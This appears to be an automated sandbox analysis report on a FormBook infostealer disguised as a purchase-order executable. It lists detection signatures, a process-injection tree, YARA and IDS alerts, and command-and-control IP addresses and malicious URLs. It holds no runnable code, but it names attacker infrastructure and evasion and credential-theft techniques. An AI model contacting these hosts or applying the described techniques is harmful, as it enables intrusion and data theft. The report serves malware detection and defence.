
Windows Analysis Report
PO 4110007694.exe

Overview

General Information

Sample name: PO 4110007694.exe
Analysis ID: 1568199
MD5: 125b9b9f3011e06fcb331140ce8bf01f
SHA1: 39268897cfc54a3bcb8e94319708f1666297f862
SHA256: ad7f45c75e8fa4024a61f3ec31ae47385ebca8092a915d5c3c4e4fcc8f117a49
Tags: exe, Formbook, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • PO 4110007694.exe (PID: 6260 cmdline: "C:\Users\user\Desktop\PO 4110007694.exe" MD5: 125B9B9F3011E06FCB331140CE8BF01F)
    • svchost.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\PO 4110007694.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • hLRGQqcplWvpUw.exe (PID: 3716 cmdline: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 1720 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • hLRGQqcplWvpUw.exe (PID: 4348 cmdline: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2836 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
Source | Rule | Description | Author
1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , CommandLine: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, NewProcessName: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, OriginalFileName: C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 1720, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe" , ProcessId: 4348, ProcessName: hLRGQqcplWvpUw.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ParentImage: C:\Users\user\Desktop\PO 4110007694.exe, ParentProcessId: 6260, ParentProcessName: PO 4110007694.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ProcessId: 6452, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ParentImage: C:\Users\user\Desktop\PO 4110007694.exe, ParentProcessId: 6260, ParentProcessName: PO 4110007694.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO 4110007694.exe", ProcessId: 6452, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T12:49:34.577709+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 161.97.168.245 | 80 | TCP
2024-12-04T12:50:00.156746+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:16.312001+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49784 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:31.856451+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49825 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:47.033657+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49862 | 185.27.134.144 | 80 | TCP
2024-12-04T12:51:02.253784+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49897 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:17.199008+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49935 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:32.537230+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49973 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:47.416118+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50012 | 209.74.77.107 | 80 | TCP
2024-12-04T12:52:14.720776+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50040 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:32.225834+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:47.426257+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50048 | 156.251.17.224 | 80 | TCP
2024-12-04T12:53:02.438178+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50052 | 47.254.140.255 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T12:49:34.577709+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 161.97.168.245 | 80 | TCP
2024-12-04T12:50:00.156746+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:16.312001+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49784 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:31.856451+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:47.033657+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49862 | 185.27.134.144 | 80 | TCP
2024-12-04T12:51:02.253784+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49897 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:17.199008+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49935 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:32.537230+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49973 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:47.416118+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 209.74.77.107 | 80 | TCP
2024-12-04T12:52:14.720776+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50040 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:32.225834+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50044 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:47.426257+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50048 | 156.251.17.224 | 80 | TCP
2024-12-04T12:53:02.438178+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50052 | 47.254.140.255 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T12:49:52.219235+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 27.124.4.246 | 80 | TCP
2024-12-04T12:49:54.844256+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 27.124.4.246 | 80 | TCP
2024-12-04T12:49:57.500488+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 27.124.4.246 | 80 | TCP
2024-12-04T12:50:08.322933+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:11.000584+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:13.656916+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49775 | 149.88.81.190 | 80 | TCP
2024-12-04T12:50:24.063375+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49802 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:26.722193+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49808 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:29.394194+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49816 | 85.159.66.93 | 80 | TCP
2024-12-04T12:50:38.879151+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49841 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:41.691760+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49847 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:44.412120+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49853 | 185.27.134.144 | 80 | TCP
2024-12-04T12:50:54.031935+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49879 | 104.21.95.160 | 80 | TCP
2024-12-04T12:50:56.413445+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49885 | 104.21.95.160 | 80 | TCP
2024-12-04T12:50:59.102269+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49891 | 104.21.95.160 | 80 | TCP
2024-12-04T12:51:09.203109+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49916 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:11.872200+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49924 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:14.514792+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49930 | 104.21.57.248 | 80 | TCP
2024-12-04T12:51:24.517114+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49953 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:27.188206+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49960 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:29.875736+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49967 | 154.88.22.101 | 80 | TCP
2024-12-04T12:51:39.434909+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49989 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:42.097305+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49998 | 209.74.77.107 | 80 | TCP
2024-12-04T12:51:44.812562+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50005 | 209.74.77.107 | 80 | TCP
2024-12-04T12:52:06.692831+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50037 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:09.364227+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50038 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:12.089088+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50039 | 104.21.34.103 | 80 | TCP
2024-12-04T12:52:24.157273+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50041 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:26.816512+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50042 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:29.518405+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50043 | 20.2.249.7 | 80 | TCP
2024-12-04T12:52:39.414424+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50045 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:42.082861+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50046 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:44.766522+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50047 | 156.251.17.224 | 80 | TCP
2024-12-04T12:52:54.298723+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50049 | 47.254.140.255 | 80 | TCP
2024-12-04T12:52:56.964994+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50050 | 47.254.140.255 | 80 | TCP
2024-12-04T12:52:59.716476+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50051 | 47.254.140.255 | 80 | TCP


AV Detection

Source: http://www.soainsaat.xyz/rum2/ ; Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3+IPEF+P87/UiJAxykznzqhXWsXbleaaytX5cXBA3Pvgu1YuM8etO94K7yngZPbDkFJ2MbPrWQrwotde8x+DERdOM8=&WnQdf=JhLPW ; Avira URL Cloud: Label: malware
Source: http://www.duwixushx.xyz/q0vk/ ; Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/?BTPDLZX=oAmOaC9rLcmuYnVqY4jJDWJ7glBqr3 ; Avira URL Cloud: Label: malware
Source: http://www.amayavp.xyz/d9ku/ ; Avira URL Cloud: Label: malware
Source: PO 4110007694.exe; ReversingLabs: Detection: 39%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000004.00000002.4114791942.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4117111147.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1895662906.0000000006D00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4113656138.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4114738212.0000000003230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1883944233.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.1885773704.0000000004DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.4114931150.0000000004180000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO 4110007694.exe; Joe Sandbox ML: detected
Source: PO 4110007694.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000001.00000003.1851384519.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1851083063.000000000301A000.00000004.00000020.00020000.00000000.sdmp, hLRGQqcplWvpUw.exe, 00000002.00000003.2206906784.000000000114B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hLRGQqcplWvpUw.exe, 00000002.00000000.1806902391.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp, hLRGQqcplWvpUw.exe, 00000007.00000002.4113682145.0000000000A0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO 4110007694.exe, 00000000.00000003.1654212049.0000000004330000.00000004.00001000.00020000.00000000.sdmp, PO 4110007694.exe, 00000000.00000003.1655277180.0000000004190000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1885175083.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1885175083.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1787377160.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1785653009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000004.00000003.1887433668.000000000310A000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000003.1891223463.00000000032B1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.00000000035FE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000004.00000002.4114989929.0000000003460000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00C7445A
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7C6D1 FindFirstFileW,FindClose,0_2_00C7C6D1
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00C7C75C
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7EF95
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00C7F0F2
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7F3F3
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C737EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C737EF
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C73B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00C73B12
Source: C:\Users\user\Desktop\PO 4110007694.exe; Code function: 0_2_00C7BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00C7BCBC
Source: C:\Windows\SysWOW64\bitsadmin.exe; Code function: 4_2_02B9C640 FindFirstFileW,FindNextFileW,FindClose,4_2_02B9C640
Source: C:\Windows\SysWOW64\bitsadmin.exe; Code function: 4x nop then xor eax, eax 4_2_02B89E80
Source: C:\Windows\SysWOW64\bitsadmin.exe; Code function: 4x nop then mov ebx, 00000004h 4_2_037B04FE

Networking

Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 27.124.4.246:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49769 -> 149.88.81.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 27.124.4.246:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 161.97.168.245:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49784 -> 149.88.81.190:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49784 -> 149.88.81.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49802 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49763 -> 149.88.81.190:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49775 -> 149.88.81.190:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49825 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49816 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49825 -> 85.159.66.93:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49847 -> 185.27.134.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 185.27.134.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 185.27.134.144:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49742 -> 27.124.4.246:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49742 -> 27.124.4.246:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49862 -> 185.27.134.144:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49862 -> 185.27.134.144:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 27.124.4.246:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49879 -> 104.21.95.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49885 -> 104.21.95.160:80
Source: Network traffic; Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49897 -> 104.21.95.160:80
Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49897 -> 104.21.95.160:80
Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49891 -> 104.21.95.160:80
